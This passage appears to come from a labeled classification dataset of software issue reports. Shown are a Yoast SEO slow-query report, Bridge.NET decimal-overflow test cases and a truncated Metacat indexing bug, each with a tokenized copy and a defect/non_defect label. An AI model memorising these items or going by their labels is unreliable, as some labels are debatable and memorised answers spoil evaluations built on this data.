SELECT SQL_CALC_FOUND_ROWS wp_posts.ID FROM wp_posts WHERE 1=1 AND wp_posts.post_type = 'post' AND (wp_posts.post_status = 'publish' OR wp_posts.post_status = 'future' OR wp_posts.post_status = 'draft' OR wp_posts.post_status = 'pending') ORDER BY wp_posts.post_date DESC LIMIT 0, 10
```
This query takes 0.5 sec on our server and EXPLAIN shows:
```
+------+-------------+----------+-------+------------------+------------------+---------+------+--------+------------------------------------------+
| id | select_type | table | type | possible_keys | key | key_len | ref | rows | Extra |
+------+-------------+----------+-------+------------------+------------------+---------+------+--------+------------------------------------------+
| 1 | SIMPLE | wp_posts | range | type_status_date | type_status_date | 164 | NULL | 453574 | Using where; Using index; Using filesort |
+------+-------------+----------+-------+------------------+------------------+---------+------+--------+------------------------------------------+
```
It is being called from:
```
do_action('admin_init'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Admin\Admin_Columns_Cache_Integration->fill_cache, WP_Query->get_posts
```
Temporary workaround is to comment out fill_cache call in function register_hooks() in wp-content/plugins/wordpress-seo/src/integrations/admin/admin-columns-cache-integration.php:
```
// \add_action( 'admin_init', [ $this, 'fill_cache' ] );
```
but actually this line should be checked:
```
$posts = empty( $wp_query->posts ) ? $wp_query->get_posts() : $wp_query->posts;
```
#### Used versions
* WordPress version: 5.7
* Yoast SEO version: 16.0.2
|
True
|
fill_cache creates high server load - <!-- Please use this template when creating an issue.
- Please check the boxes after you've created your issue.
- Please use the latest version of Yoast SEO.-->
* [x] I've read and understood the [contribution guidelines](https://github.com/Yoast/wordpress-seo/blob/trunk/.github/CONTRIBUTING.md).
* [x] I've searched for any related issues and avoided creating a duplicate issue.
### Please give us a description of what happened.
After upgrade from Yoast SEO from 13.5 to 16.0.2 experiencing high server load.
### Please describe what you expected to happen and why.
The reason is very slow SQL query being executed on every ajax request:
```
SELECT SQL_CALC_FOUND_ROWS wp_posts.ID FROM wp_posts WHERE 1=1 AND wp_posts.post_type = 'post' AND (wp_posts.post_status = 'publish' OR wp_posts.post_status = 'future' OR wp_posts.post_status = 'draft' OR wp_posts.post_status = 'pending') ORDER BY wp_posts.post_date DESC LIMIT 0, 10
```
This query takes 0.5 sec on our server and EXPLAIN shows:
```
+------+-------------+----------+-------+------------------+------------------+---------+------+--------+------------------------------------------+
| id | select_type | table | type | possible_keys | key | key_len | ref | rows | Extra |
+------+-------------+----------+-------+------------------+------------------+---------+------+--------+------------------------------------------+
| 1 | SIMPLE | wp_posts | range | type_status_date | type_status_date | 164 | NULL | 453574 | Using where; Using index; Using filesort |
+------+-------------+----------+-------+------------------+------------------+---------+------+--------+------------------------------------------+
```
It is being called from:
```
do_action('admin_init'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Admin\Admin_Columns_Cache_Integration->fill_cache, WP_Query->get_posts
```
Temporary workaround is to comment out fill_cache call in function register_hooks() in wp-content/plugins/wordpress-seo/src/integrations/admin/admin-columns-cache-integration.php:
```
// \add_action( 'admin_init', [ $this, 'fill_cache' ] );
```
but actually this line should be checked:
```
$posts = empty( $wp_query->posts ) ? $wp_query->get_posts() : $wp_query->posts;
```
#### Used versions
* WordPress version: 5.7
* Yoast SEO version: 16.0.2
|
non_defect
|
fill cache creates high server load please use this template when creating an issue please check the boxes after you ve created your issue please use the latest version of yoast seo i ve read and understood the i ve searched for any related issues and avoided creating a duplicate issue please give us a description of what happened after upgrade from yoast seo from to experiencing high server load please describe what you expected to happen and why the reason is very slow sql query being executed on every ajax request select sql calc found rows wp posts id from wp posts where and wp posts post type post and wp posts post status publish or wp posts post status future or wp posts post status draft or wp posts post status pending order by wp posts post date desc limit this query takes sec on our server and explain shows id select type table type possible keys key key len ref rows extra simple wp posts range type status date type status date null using where using index using filesort it is being called from do action admin init wp hook do action wp hook apply filters yoast wp seo integrations admin admin columns cache integration fill cache wp query get posts temporary workaround is to comment out fill cache call in function register hooks in wp content plugins wordpress seo src integrations admin admin columns cache integration php add action admin init but actually this line should be checked posts empty wp query posts wp query get posts wp query posts used versions wordpress version yoast seo version
| 0
|
25,519
| 4,365,411,789
|
IssuesEvent
|
2016-08-03 10:44:02
|
bridgedotnet/Bridge
|
https://api.github.com/repos/bridgedotnet/Bridge
|
opened
|
Decimal - No expected OverflowException
|
defect portage
|
### Expected
`System.OverflowException`
### Steps To Reproduce
```csharp
public class App
{
public static void ConversionsToDecimalWork()
{
int x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal)(x + 79228162514264337593543950336f);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal)(x - 79228162514264337593543950336f);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal)(x + 79228162514264337593543950336.0);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal)(x - 79228162514264337593543950336.0);
});
}
public static void ConversionsToDecimalWork()
{
int? x1 = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal?)(x1 + 79228162514264337593543950336f);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal?)(x1 - 79228162514264337593543950336f);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal?)(x1 + 79228162514264337593543950336.0);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal?)(x1 - 79228162514264337593543950336.0);
});
}
public static void DecimalToSByte()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToSByte(x - 129);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToSByte(x + 128);
});
}
public static void DecimalToByte()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToByte(x - 1);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToByte(x + 256);
});
}
public static void DecimalToShort()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToInt16(x - 32769);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToInt16(x + 32768);
});
}
public void DecimalToUShort()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToUInt16(x - 1);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToUInt16(x + 65536);
});
}
public void DecimalToInt()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToInt32(x - 2147483649);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToInt32(x + 2147483648);
});
}
public void DecimalToUInt()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToUInt32(x - 1);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToUInt32(x + 4294967296);
});
}
}
```
|
1.0
|
Decimal - No expected OverflowException - ### Expected
`System.OverflowException`
### Steps To Reproduce
```csharp
public class App
{
public static void ConversionsToDecimalWork()
{
int x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal)(x + 79228162514264337593543950336f);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal)(x - 79228162514264337593543950336f);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal)(x + 79228162514264337593543950336.0);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal)(x - 79228162514264337593543950336.0);
});
}
public static void ConversionsToDecimalWork()
{
int? x1 = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal?)(x1 + 79228162514264337593543950336f);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal?)(x1 - 79228162514264337593543950336f);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal?)(x1 + 79228162514264337593543950336.0);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal?)(x1 - 79228162514264337593543950336.0);
});
}
public static void DecimalToSByte()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToSByte(x - 129);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToSByte(x + 128);
});
}
public static void DecimalToByte()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToByte(x - 1);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToByte(x + 256);
});
}
public static void DecimalToShort()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToInt16(x - 32769);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToInt16(x + 32768);
});
}
public void DecimalToUShort()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToUInt16(x - 1);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToUInt16(x + 65536);
});
}
public void DecimalToInt()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToInt32(x - 2147483649);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToInt32(x + 2147483648);
});
}
public void DecimalToUInt()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToUInt32(x - 1);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToUInt32(x + 4294967296);
});
}
}
```
|
defect
|
decimal no expected overflowexception expected system overflowexception steps to reproduce csharp public class app public static void conversionstodecimalwork int x assert throws var decimal x assert throws var decimal x assert throws var decimal x assert throws var decimal x public static void conversionstodecimalwork int assert throws var decimal assert throws var decimal assert throws var decimal assert throws var decimal public static void decimaltosbyte decimal x assert throws var decimal tosbyte x assert throws var decimal tosbyte x public static void decimaltobyte decimal x assert throws var decimal tobyte x assert throws var decimal tobyte x public static void decimaltoshort decimal x assert throws var decimal x assert throws var decimal x public void decimaltoushort decimal x assert throws var decimal x assert throws var decimal x public void decimaltoint decimal x assert throws var decimal x assert throws var decimal x public void decimaltouint decimal x assert throws var decimal x assert throws var decimal x
| 1
|
65,964
| 19,830,864,337
|
IssuesEvent
|
2022-01-20 11:50:33
|
GoldenSoftwareLtd/gedemin
|
https://api.github.com/repos/GoldenSoftwareLtd/gedemin
|
closed
|
Mysterious RUIDs: a RUID is generated although it shouldn't be
|
Type-Defect Depot BigID
|
It has been noticed that records from INV_MOVEMENT can have corresponding entries in GD_RUID!
Both on client databases and on the reference database.
On the reference database I work as an administrator, creating/deleting/editing various documents. Some movements have RUIDs, others don't. It does not depend on the document type. For one line item of a given header a RUID may exist, for another it may not.
Here is an example. Note the highlighted part: 4 movements were created for the same line item; one pair has RUIDs, the other does not.

I searched the scripts and metadata but did not find where the RUID could be inserted (somewhere in the exe?).
If we switch to another generator while RUIDs are silently created for movements and postings, we could end up with a conflict when writing to GD_RUID.
We need to understand where these RUIDs are inserted, and why.
|
1.0
|
Mysterious RUIDs: a RUID is generated although it shouldn't be - It has been noticed that records from INV_MOVEMENT can have corresponding entries in GD_RUID!
Both on client databases and on the reference database.
On the reference database I work as an administrator, creating/deleting/editing various documents. Some movements have RUIDs, others don't. It does not depend on the document type. For one line item of a given header a RUID may exist, for another it may not.
Here is an example. Note the highlighted part: 4 movements were created for the same line item; one pair has RUIDs, the other does not.

I searched the scripts and metadata but did not find where the RUID could be inserted (somewhere in the exe?).
If we switch to another generator while RUIDs are silently created for movements and postings, we could end up with a conflict when writing to GD_RUID.
We need to understand where these RUIDs are inserted, and why.
|
defect
|
загадочные руиды руид генерируется хотя не должен замечено что записям из inv movement могут соответствовать данные в gd ruid и на клиентских базах и на эталоне на эталоне я работаю под администратором создаю удаляю редактирую разные документы по некоторым движениям руиды есть по другим нет от типа документа не зависит по одной позиции одной шапки руид может быть по другой нет вот есть даже пример обратите внимание на выделенную часть движения созданы по одной и той же позиции по одной паре руиды есть по другой нет поискала в скриптах и метаданных не нашла где может вставляться руид где то в ехе если мы перейдем на другой генератор а руиды втихаря будут создаваться для мувментов и проводок можем в итоге получить конфликт при записи в гд руид надо понять где эти руиды вставляются и зачем
| 1
|
627,701
| 19,912,386,957
|
IssuesEvent
|
2022-01-25 18:31:18
|
bcgov/entity
|
https://api.github.com/repos/bcgov/entity
|
closed
|
Account Switching Issue
|
bug Priority1 Assets
|
**Describe the bug in the current situation:**
When trying to switch from one account to another (Basic to Premium), it doesn't get switched
**Link bug to the User Story:**
**Impact of this bug:**
High
**Pre Conditions:**
**Steps to Reproduce:**
1. Log in to Test using BC Services Card (BCREG2014)
2. Navigate to My Business Registry
3. Click on the Account menu on the top.
4. Switch from "North Shore Credit Union" to "BITHEAD CONSULTING", sometimes the message displays as it got switched, but doesn't switch.
Current Behavior when Login to BCREG2014:

When My Business Registry tile is clicked:

|
1.0
|
Account Switching Issue - **Describe the bug in the current situation:**
When trying to switch from one account to another (Basic to Premium), it doesn't get switched
**Link bug to the User Story:**
**Impact of this bug:**
High
**Pre Conditions:**
**Steps to Reproduce:**
1. Log in to Test using BC Services Card (BCREG2014)
2. Navigate to My Business Registry
3. Click on the Account menu on the top.
4. Switch from "North Shore Credit Union" to "BITHEAD CONSULTING", sometimes the message displays as it got switched, but doesn't switch.
Current Behavior when Login to BCREG2014:

When My Business Registry tile is clicked:

|
non_defect
|
account switching issue describe the bug in the current situation when trying to switch from one account to another basic to premium it doesn t get switched link bug to the user story impact of this bug high pre conditions steps to reproduce log in to test using bc services card navigate to my business registry click on the account menu on the top switch from north shore credit union to bithead consulting sometimes the message displays as it got switched but doesn t switch current behavior when login to when my business registry tile is clicked
| 0
|
173,826
| 14,439,029,854
|
IssuesEvent
|
2020-12-07 13:52:19
|
geosolutions-it/austrocontrol-C125
|
https://api.github.com/repos/geosolutions-it/austrocontrol-C125
|
closed
|
Client ID 20 - Responsive Design - Info Box
|
Accepted C125-2020-AUSTROCONTROL-Map2Imp Documentation user feedback
|
- Not shown as i-sign in toolbar (specified in technical proposal)
- Not shown on mobile devices
- Right alignment for the image doesn't work (it is correctly shown in editing mode, but not saved)
- Size of modal info box is not responsive, but has a fixed size. Therefore there may be a lot of whitespace.
|
1.0
|
Client ID 20 - Responsive Design - Info Box - - Not shown as i-sign in toolbar (specified in technical proposal)
- Not shown on mobile devices
- Right alignment for the image doesn't work (it is correctly shown in editing mode, but not saved)
- Size of modal info box is not responsive, but has a fixed size. Therefore there may be a lot of whitespace.
|
non_defect
|
client id responsive design info box not shown as i sign in toolbar specified in technical proposal not shown on mobile devices right align for image doesn t work it is correclty shown in editing mode but not saved size of modal info box is not responsive but has a fixed size therefore there may be a lot of whitespace
| 0
|
7,794
| 2,610,636,953
|
IssuesEvent
|
2015-02-26 21:33:42
|
alistairreilly/open-ig
|
https://api.github.com/repos/alistairreilly/open-ig
|
closed
|
Star map & left-click on an unexplored area
|
auto-migrated Milestone-0.93.500 Priority-Medium Type-Defect UI-Layout
|
```
While testing the sounds, I clicked around on unexplored areas and was able to
select 1 planet. I could do this several times, and this should not happen;
in principle the unexplored map should be "static" in this
respect.
```
Original issue reported on code.google.com by `Jozsef.T...@gmail.com` on 25 Aug 2011 at 6:10
|
1.0
|
Star map & left-click on an unexplored area - ```
While testing the sounds, I clicked around on unexplored areas and was able to
select 1 planet. I could do this several times, and this should not happen;
in principle the unexplored map should be "static" in this
respect.
```
Original issue reported on code.google.com by `Jozsef.T...@gmail.com` on 25 Aug 2011 at 6:10
|
defect
|
csillagtérkép bal klikk felfedezetlen részen ahogy teszteltem a hangokat kattogtattam felfedezetlen területeken és ki tudtam jelölni bolygót ezt többször is meg tudtam csinálni és ennek nem szabadna megtörténnie elvileg a felfedezetlen térkép ilyen szempontból statikus nak kellene lennie original issue reported on code google com by jozsef t gmail com on aug at
| 1
|
50,904
| 13,187,963,597
|
IssuesEvent
|
2020-08-13 05:09:24
|
icecube-trac/tix3
|
https://api.github.com/repos/icecube-trac/tix3
|
closed
|
[filterscripts] make sure it builds without ROOT in the toolstack (Trac #1656)
|
Migrated from Trac cmake defect
|
Make sure filterscripts is OK without ROOT, just exclude the small bits that need it.
<details>
<summary><em>Migrated from <a href="https://code.icecube.wisc.edu/ticket/1656">https://code.icecube.wisc.edu/ticket/1656</a>, reported by blaufuss and owned by blaufuss</em></summary>
<p>
```json
{
"status": "closed",
"changetime": "2019-02-13T14:11:57",
"description": "Make sure filterscripts is OK without ROOT, just exclude the small bits that need it.\n\n",
"reporter": "blaufuss",
"cc": "",
"resolution": "fixed",
"_ts": "1550067117911749",
"component": "cmake",
"summary": "[filterscripts] make sure it builds without ROOT in the toolstack",
"priority": "normal",
"keywords": "",
"time": "2016-04-25T20:36:20",
"milestone": "",
"owner": "blaufuss",
"type": "defect"
}
```
</p>
</details>
|
1.0
|
[filterscripts] make sure it builds without ROOT in the toolstack (Trac #1656) - Make sure filterscripts is OK without ROOT, just exclude the small bits that need it.
<details>
<summary><em>Migrated from <a href="https://code.icecube.wisc.edu/ticket/1656">https://code.icecube.wisc.edu/ticket/1656</a>, reported by blaufuss and owned by blaufuss</em></summary>
<p>
```json
{
"status": "closed",
"changetime": "2019-02-13T14:11:57",
"description": "Make sure filterscripts is OK without ROOT, just exclude the small bits that need it.\n\n",
"reporter": "blaufuss",
"cc": "",
"resolution": "fixed",
"_ts": "1550067117911749",
"component": "cmake",
"summary": "[filterscripts] make sure it builds without ROOT in the toolstack",
"priority": "normal",
"keywords": "",
"time": "2016-04-25T20:36:20",
"milestone": "",
"owner": "blaufuss",
"type": "defect"
}
```
</p>
</details>
|
defect
|
make sure it builds without root in the toolstack trac make sure filterscripts is ok without root just exclude the small bits that need it migrated from json status closed changetime description make sure filterscripts is ok without root just exclude the small bits that need it n n reporter blaufuss cc resolution fixed ts component cmake summary make sure it builds without root in the toolstack priority normal keywords time milestone owner blaufuss type defect
| 1
|
370,281
| 10,927,647,316
|
IssuesEvent
|
2019-11-22 17:08:51
|
arfc/arfc.github.io
|
https://api.github.com/repos/arfc/arfc.github.io
|
closed
|
Make guide how to use Git Large File Storage
|
Comp:Input Difficulty:1-Beginner Priority:2-Normal Status:5-In Review Type:Feature
|
Create the manual on how to use Git Large File Storage
## I'm submitting a ...
- [ ] bug report
- [x] feature request
- [ ] question
## Expected Behavior
## Actual Behavior
## Steps to Reproduce the Problem
1.
1.
1.
## Specifications
- Version:
- Platform:
- Subsystem:
## How can this issue be closed?
This issue can be closed when manual will be added to the website.
|
1.0
|
Make guide how to use Git Large File Storage - Create the manual on how to use Git Large File Storage
## I'm submitting a ...
- [ ] bug report
- [x] feature request
- [ ] question
## Expected Behavior
## Actual Behavior
## Steps to Reproduce the Problem
1.
1.
1.
## Specifications
- Version:
- Platform:
- Subsystem:
## How can this issue be closed?
This issue can be closed when manual will be added to the website.
|
non_defect
|
make guide how to use git large file storage create the manual on how to use git large file storage i m submitting a bug report feature request question expected behavior actual behavior steps to reproduce the problem specifications version platform subsystem how can this issue be closed this issue can be closed when manual will be added to the website
| 0
|
66,299
| 20,122,728,267
|
IssuesEvent
|
2022-02-08 05:23:06
|
decentraland/unity-renderer
|
https://api.github.com/repos/decentraland/unity-renderer
|
opened
|
NFTShapes (AKA Picture Frames) not working on desktop client
|
defect
|
Neither static images, like the ones in the Genesis Plaza mini NFTshapes gallery, nor GIFs, like the ones in the north-west gallery in Soho Plaza, are working.
|
1.0
|
NFTShapes (AKA Picture Frames) not working on desktop client - Neither static images, like the ones in the Genesis Plaza mini NFTshapes gallery, nor GIFs, like the ones in the north-west gallery in Soho Plaza, are working.
|
defect
|
nftshapes aka picture frames not working on desktop client neither static images like the ones in the genesis plaza mini nftshapes gallery nor gifs like the ones in the north west gallery in soho plaza
| 1
|
65,875
| 19,749,388,158
|
IssuesEvent
|
2022-01-15 00:02:54
|
openzfs/zfs
|
https://api.github.com/repos/openzfs/zfs
|
closed
|
nfstest_sparse fails for SEEK operations with NFS+ZFS.
|
Component: Share Type: Defect Status: Stale
|
<!-- Please fill out the following template, which will help other contributors address your issue. -->
<!--
Thank you for reporting an issue.
*IMPORTANT* - Please check our issue tracker before opening a new issue.
Additional valuable information can be found in the OpenZFS documentation
and mailing list archives.
Please fill in as much of the template as possible.
-->
### System information
Distribution Name | Ubuntu
Distribution Version | 20.04
Linux Kernel | 5.4.0-51-generic
Architecture | x86_64
ZFS Version | 0.8.3-1ubuntu12.4
SPL Version | 0.8.3-1ubuntu12.4
### Describe the problem you're observing
nfstest_sparse is part of NFSTest suite. This test fails with the following error:
```
DBG3: 10:32:17.189694 - SEEK using SEEK_DATA on file /mnt/nfstest1/nfstest_sparse_20201014103210_f_2 starting at offset 65536
INFO: 10:32:17.258652 - SEEK returned offset 65536
DBG2: 10:32:17.258879 - Trace stop
DBG2: 10:32:17.258980 - /usr/bin/sudo killall tcpdump
DBG2: 10:32:17.289253 - /usr/bin/sudo kill 135694
PASS: SEEK should succeed searching for the next data
FAIL: SEEK should return correct offset when the next data is found, expecting offset 131072 but got 65536
```
[nfstest_sparse_20201014103210.log](https://github.com/openzfs/zfs/files/5388420/nfstest_sparse_20201014103210.log)
### Describe how to reproduce the problem
Run nfstest_sparse with an export backed by ZFS
```
nfstest_sparse -s <nfs-server-ip> -e /<export-name> -m /mnt/nfstest1 --createlog --tmpdir /tmp --createtraces --keeptraces -v debug --runtest seek01
```
If the test is run against an export backed by ext4, it passes.
### Include any warning/errors/backtraces from the system logs
|
1.0
|
nfstest_sparse fails for SEEK operations with NFS+ZFS. - <!-- Please fill out the following template, which will help other contributors address your issue. -->
<!--
Thank you for reporting an issue.
*IMPORTANT* - Please check our issue tracker before opening a new issue.
Additional valuable information can be found in the OpenZFS documentation
and mailing list archives.
Please fill in as much of the template as possible.
-->
### System information
Distribution Name | Ubuntu
Distribution Version | 20.04
Linux Kernel | 5.4.0-51-generic
Architecture | x86_64
ZFS Version | 0.8.3-1ubuntu12.4
SPL Version | 0.8.3-1ubuntu12.4
### Describe the problem you're observing
nfstest_sparse is part of NFSTest suite. This test fails with the following error:
```
DBG3: 10:32:17.189694 - SEEK using SEEK_DATA on file /mnt/nfstest1/nfstest_sparse_20201014103210_f_2 starting at offset 65536
INFO: 10:32:17.258652 - SEEK returned offset 65536
DBG2: 10:32:17.258879 - Trace stop
DBG2: 10:32:17.258980 - /usr/bin/sudo killall tcpdump
DBG2: 10:32:17.289253 - /usr/bin/sudo kill 135694
PASS: SEEK should succeed searching for the next data
FAIL: SEEK should return correct offset when the next data is found, expecting offset 131072 but got 65536
```
[nfstest_sparse_20201014103210.log](https://github.com/openzfs/zfs/files/5388420/nfstest_sparse_20201014103210.log)
### Describe how to reproduce the problem
Run nfstest_sparse with an export backed by ZFS
```
nfstest_sparse -s <nfs-server-ip> -e /<export-name> -m /mnt/nfstest1 --createlog --tmpdir /tmp --createtraces --keeptraces -v debug --runtest seek01
```
If the test is run against an export backed by ext4, it passes.
### Include any warning/errors/backtraces from the system logs
|
defect
|
nfstest sparse fails for seek operations with nfs zfs thank you for reporting an issue important please check our issue tracker before opening a new issue additional valuable information can be found in the openzfs documentation and mailing list archives please fill in as much of the template as possible system information distribution name ubuntu distribution version linux kernel generic architecture zfs version spl version describe the problem you re observing nfstest sparse is part of nfstest suite this test fails with the following error seek using seek data on file mnt nfstest sparse f starting at offset info seek returned offset trace stop usr bin sudo killall tcpdump usr bin sudo kill pass seek should succeed searching for the next data fail seek should return correct offset when the next data is found expecting offset but got describe how to reproduce the problem run nfstest sparse with an export backed by zfs nfstest sparse s e m mnt createlog tmpdir tmp createtraces keeptraces v debug runtest if the test is run against an export backed by it passes include any warning errors backtraces from the system logs
| 1
|
62,893
| 17,242,700,934
|
IssuesEvent
|
2021-07-21 02:29:46
|
vector-im/element-web
|
https://api.github.com/repos/vector-im/element-web
|
opened
|
Message bubble corner rounding doesn't take into account whether events have a tile
|
A-Appearance A-MessageBubbles S-Tolerable T-Defect
|
Message bubbles apparently try to square off the corners of bubbles that are touching. But if someone sends a message and then edits it immediately afterwards, the bottom left corner of that message will be square instead of round since it thinks the edit event will appear in its own bubble, when that is not in fact the case.

|
1.0
|
Message bubble corner rounding doesn't take into account whether events have a tile - Message bubbles apparently try to square off the corners of bubbles that are touching. But if someone sends a message and then edits it immediately afterwards, the bottom left corner of that message will be square instead of round since it thinks the edit event will appear in its own bubble, when that is not in fact the case.

|
defect
|
message bubble corner rounding doesn t take into account whether events have a tile message bubbles apparently try to square off the corners of bubbles that are touching but if someone sends a message and then edits it immediately afterwards the bottom left corner of that message will be square instead of round since it thinks the edit event will appear in its own bubble when that is not in fact the case
| 1
|
32,529
| 6,819,773,647
|
IssuesEvent
|
2017-11-07 11:26:11
|
jOOQ/jOOQ
|
https://api.github.com/repos/jOOQ/jOOQ
|
closed
|
ConvertAll inefficiently unboxes and boxes primitive types
|
C: Functionality P: Medium R: Fixed T: Defect
|
The internal `ConvertAll` utility inefficiently unboxes and boxes between `Integer.class` and `int.class` types. If we already have the right boxed value, there's no need to run through the numeric conversion, we can just return the boxed value directly:

This seems to reduce CPU time considerably in many cases where we map to POJOs that use primitive types in their methods / members.
|
1.0
|
ConvertAll inefficiently unboxes and boxes primitive types - The internal `ConvertAll` utility inefficiently unboxes and boxes between `Integer.class` and `int.class` types. If we already have the right boxed value, there's no need to run through the numeric conversion, we can just return the boxed value directly:

This seems to reduce CPU time considerably in many cases where we map to POJOs that use primitive types in their methods / members.
|
defect
|
convertall inefficiently unboxes and boxes primitive types the internal convertall utility inefficiently unboxes and boxes between integer class and int class types if we already have the right boxed value there s no need to run through the numeric conversion we can just return the boxed value directly this seems to reduce cpu time considerably in many cases where we map to pojos that use primitive types in their methods members
| 1
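The ConvertAll record above describes a fast-path optimization: when the input is already an instance of the requested type, return it directly instead of running the unbox/re-box numeric conversion. A minimal Python sketch of that short-circuit (all names here are illustrative; the real jOOQ `ConvertAll` logic is Java and operates on `Integer.class`/`int.class`):

```python
def convert(value, target):
    """Return `value` as an instance of `target`.

    Fast path: if the value already has the target type, hand back the
    same object and skip the conversion machinery entirely.
    Slow path: fall through to an explicit conversion call.
    """
    if isinstance(value, target):
        return value          # no conversion round trip needed
    return target(value)      # e.g. int("3") -> 3
```

The point of the fix in the issue is exactly this `isinstance` guard: avoiding the needless round trip is what reduced CPU time when mapping to POJOs with primitive-typed members.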
|
219,055
| 7,333,094,422
|
IssuesEvent
|
2018-03-05 18:17:51
|
NCEAS/metacat
|
https://api.github.com/repos/NCEAS/metacat
|
closed
|
Metadata/data objects which have obsoletedBy field ignore the resource map index
|
Category: index Component: Bugzilla-Id Priority: Normal Status: Closed Tracker: Bug
|
---
Author Name: **Jing Tao** (Jing Tao)
Original Redmine Issue: 7083, https://projects.ecoinformatics.org/ecoinfo/issues/7083
Original Date: 2016-08-08
Original Assignee: Jing Tao
---
Hi Bryce:
I looked at the index of the 16 objects and found 5 of them don't have the value of resource_map_urn:uuid:2e3c8c4c-e606-4710-b321-8edc4d506b0a at the resourceMap element:
urn%3Auuid%3A0f64673d-d270-411f-a5ed-98351d3d9450
urn%3Auuid%3A12c0ab6a-5eb3-43de-a16c-e71acaeb9817
urn%3Auuid%3A45ee065f-746e-4780-872b-d98cabeb0ad7
urn%3Auuid%3Aae90efa8-3cf5-4ff9-9637-c7be28b06541
urn%3Auuid%3Accebed0b-6bdb-4853-ba2a-6e88321ea4d5
So this is the reason you only get 11 documents when you query this resource map value.
And all of the five objects have the field "obsoletedBy" and the other 11 objects don't have the field.
The reason why I looked at the field "obsoletedBy" is I recently found that there was a bug in the d1_cn_index_processor component - when you index a resource map, the component in the resource map will ignore the resource map if it has the "obsoletedBy" field. So this issue sounds like the reflection of this bug.
I will look at the metacat index code to make sure.
Thanks,
Jing
On 8/8/16 12:13 PM, Bryce Mecum wrote:
>
> So @scng got a hold of me to ask about strange behavior where there package table on two dataset pages are not showing the right number of files. This is a write up of what she told me and what I found so that someone else, @couture or @cjones can see about addressing it. This is a blocker on Bill Simpson's ticket RT12930.
>
> This applies to two packages:
>
> O-Buoy 8 (needs link)
> O-Buoy 15
>
> These two packages were recently updated to make them editable (adding otherEntity elements to the EML) by @scng using the R package.
>
> If you look at O-Buoy 15, you'll see ten data objects in the package. However, the R @scng wrote intended to add 15 data objects to the package. If you look at the resource map, resource_map_urn:uuid:2e3c8c4c-e606-4710-b321-8edc4d506b0a, you'll see it aggregates+documents 16 PIDs (metadata + 15 data):
>
> Here's an invalid and abridged section from the resource map, converted to Turtle format before pasting here:
> ...
> ore:aggregates <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A0f64673d-d270-411f-a5ed-98351d3d9450>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A12c0ab6a-5eb3-43de-a16c-e71acaeb9817>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A1584c53e-3d5c-4b70-9bf6-1033de8e2fd1>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A1c2d1c50-4d79-4fe5-b650-024e63818336>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A2e3c8c4c-e606-4710-b321-8edc4d506b0a>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A30a3a76c-c965-4594-8cfd-c652d46ebbe5>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A40d6e8e4-83eb-4579-8b00-90bf28282769>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A45ee065f-746e-4780-872b-d98cabeb0ad7>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A4eb92d77-19f4-4a3a-8468-4022926ea4e2>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A6d57e765-32a0-4a3e-ba12-5e681f92b7e5>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A73926857-7d7c-4a6e-bce3-1556bd98df01>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A770eb22d-88bb-4c6f-9016-283f4ff7a518>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A8539eac4-21f5-4a3a-8c0a-5ad7249cf38c>
